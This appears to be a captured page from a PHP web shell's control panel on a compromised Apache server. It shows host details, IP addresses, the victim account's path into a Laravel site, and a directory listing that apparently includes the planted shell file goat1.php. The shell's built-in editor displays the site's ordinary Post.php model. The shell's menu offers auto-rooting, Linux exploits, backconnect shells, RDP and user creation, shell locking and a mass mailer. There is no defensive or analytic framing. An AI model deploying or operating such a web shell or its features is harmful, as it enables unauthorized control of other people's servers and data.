Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.252
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo3.com /
app /
[ HOME SHELL ]
Name
Size
Permission
Action
Actions
[ DIR ]
drwxr-xr-x
Console
[ DIR ]
drwxr-xr-x
Exceptions
[ DIR ]
drwxr-xr-x
Helpers
[ DIR ]
drwxr-xr-x
Http
[ DIR ]
drwxr-xr-x
Providers
[ DIR ]
drwxr-xr-x
View
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
AdSense.php
292
B
-rw-r--r--
Audio.php
363
B
-rw-r--r--
Book.php
244
B
-rw-r--r--
Category.php
769
B
-rw-r--r--
Client.php
449
B
-rw-r--r--
Comment.php
584
B
-rw-r--r--
Favourite.php
576
B
-rw-r--r--
Gallery.php
478
B
-rw-r--r--
ImageUpload.php
370
B
-rw-r--r--
Instagram.php
589
B
-rw-r--r--
Menu.php
407
B
-rw-r--r--
Message.php
409
B
-rw-r--r--
Post.php
1.67
KB
-rw-r--r--
User.php
1.32
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
menu_item.php
462
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Post.php
<?php namespace App; use Illuminate\Database\Eloquent\Model; use Cviebrock\EloquentSluggable\Sluggable; use App\ImageUpload; use App\Favourite; use App\Instagram; use App\Category; use App\Comment; use App\Audio; use App\User; class Post extends Model { use Sluggable; /** * Return the sluggable configuration array for this model. * * @return array */ public function sluggable(): array { return [ 'slug' => [ 'source' => 'Title_en' ] ]; } /** * The attributes that are mass assignable. * * @var array */ protected $fillable = [ 'author_id', 'category_id','Title_ar','Title_en','Title_tr','body_ar','body_en', 'body_tr','ImageUpload_id','slug','meta_description','meta_keywords','seo_title','Downloud','featured', 'registration','mileage','transmission','fuel','manufacturers','body_type','video' ]; // THIS function Category public function Category() { return $this->belongsTo(Category::class,'category_id'); } // THIS function User public function User() { return $this->belongsTo(User::class,'author_id'); } public function ImageUpload() { return $this->belongsTo(ImageUpload::class,'ImageUpload_id'); } public function Audio() { return $this->belongsTo(Audio::class,'seo_title'); } // THIS function Comment TO MAKE RELATHION public function Comments() { return $this->hasMany('App\Comment'); } // THIS function Favourites TO MAKE RELATHION public function Favourites() { return $this->hasMany('App\Favourite'); } }
Close